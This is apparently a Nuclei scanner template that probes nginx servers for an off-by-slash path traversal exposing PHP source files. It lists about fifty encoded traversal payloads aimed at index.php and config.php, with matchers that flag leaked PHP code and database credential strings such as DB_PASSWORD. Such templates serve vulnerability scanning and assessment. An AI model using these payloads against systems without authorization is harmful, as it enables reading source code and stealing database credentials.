id: config-php-nginxoffbyslash

info:
  name: Config PHP Configuration Exposure
  author: reewardius
  severity: high
  tags: nginx,php,generic
  
http:
  - method: GET
    path:
      - "{{BaseURL}}../config.php"
      - "{{BaseURL}}../index.php"
      - "{{BaseURL}}....//index.php"
      - "{{BaseURL}}//....index.php"
      - "{{BaseURL}}%252e%252e%255cindex.php"
      - "{{BaseURL}}%2e%2e%5cindex.php"
      - "{{BaseURL}}..%255cindex.php"
      - "{{BaseURL}}..%5cindex.php"
      - "{{BaseURL}}%5c../index.php"
      - "{{BaseURL}}/%5c..index.php"
      - "{{BaseURL}}..\\index.php"
      - "{{BaseURL}}%2e%2e%2findex.php"
      - "{{BaseURL}}../index.php"
      - "{{BaseURL}}..%2findex.php"
      - "{{BaseURL}}%2e%2e/index.php"
      - "{{BaseURL}}%2e%2e%2findex.php"
      - "{{BaseURL}}..%252findex.php"
      - "{{BaseURL}}%252e%252e/index.php"
      - "{{BaseURL}}%252e%252e%252findex.php"
      - "{{BaseURL}}..%5c..%5cindex.php"
      - "{{BaseURL}}%2e%2e\\index.php"
      - "{{BaseURL}}%2e%2e%5cindex.php"
      - "{{BaseURL}}%252e%252e\\index.php"
      - "{{BaseURL}}%252e%252e%255cindex.php"
      - "{{BaseURL}}..%c0%afindex.php"
      - "{{BaseURL}}%c0%ae%c0%ae/index.php"
      - "{{BaseURL}}%c0%ae%c0%ae%c0%afindex.php"
      - "{{BaseURL}}..%25c0%25afindex.php"
      - "{{BaseURL}}%25c0%25ae%25c0%25ae/index.php"
      - "{{BaseURL}}%25c0%25ae%25c0%25ae%25c0%25afindex.php"
      - "{{BaseURL}}..%c1%9cindex.php"
      - "{{BaseURL}}%c0%ae%c0%ae\\index.php"
      - "{{BaseURL}}%c0%ae%c0%ae%c1%9cindex.php"
      - "{{BaseURL}}..%25c1%259cindex.php"
      - "{{BaseURL}}%25c0%25ae%25c0%25ae\\index.php"
      - "{{BaseURL}}%25c0%25ae%25c0%25ae%25c1%259cindex.php"
      - "{{BaseURL}}..%%32%66index.php"
      - "{{BaseURL}}%%32%65%%32%65/index.php"
      - "{{BaseURL}}%%32%65%%32%65%%32%66index.php"
      - "{{BaseURL}}..%%35%63index.php"
      - "{{BaseURL}}%%32%65%%32%65/index.php"
      - "{{BaseURL}}%%32%65%%32%65%%35%63index.php"
      - "{{BaseURL}}../index.php"
      - "{{BaseURL}}...\\index.php"
      - "{{BaseURL}}..../index.php"
      - "{{BaseURL}}....\\index.php"
      - "{{BaseURL}}........................................................................../index.php"
      - "{{BaseURL}}..........................................................................\\index.php"
      - "{{BaseURL}}..%u2215index.php"
      - "{{BaseURL}}%uff0e%uff0e%u2215index.php"
      - "{{BaseURL}}..%u2216index.php"
      - "{{BaseURL}}..%uEFC8index.php"
      - "{{BaseURL}}..%uF025index.php"
      - "{{BaseURL}}%uff0e%uff0e\\index.php"
      - "{{BaseURL}}%uff0e%uff0e%u2216index.php"
      - "{{BaseURL}}%FF%2E%FF%2E/index.php"
    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "<?php"
          
      - type: word
        part: body
        words:
          - "$_GET["
          - "$_POST["
          - "$_REQUEST["
          - "$_SERVER["
          - "'DB_PASSWORD'"
          - "DB_PASS"
          - "define('DB_"
        condition: or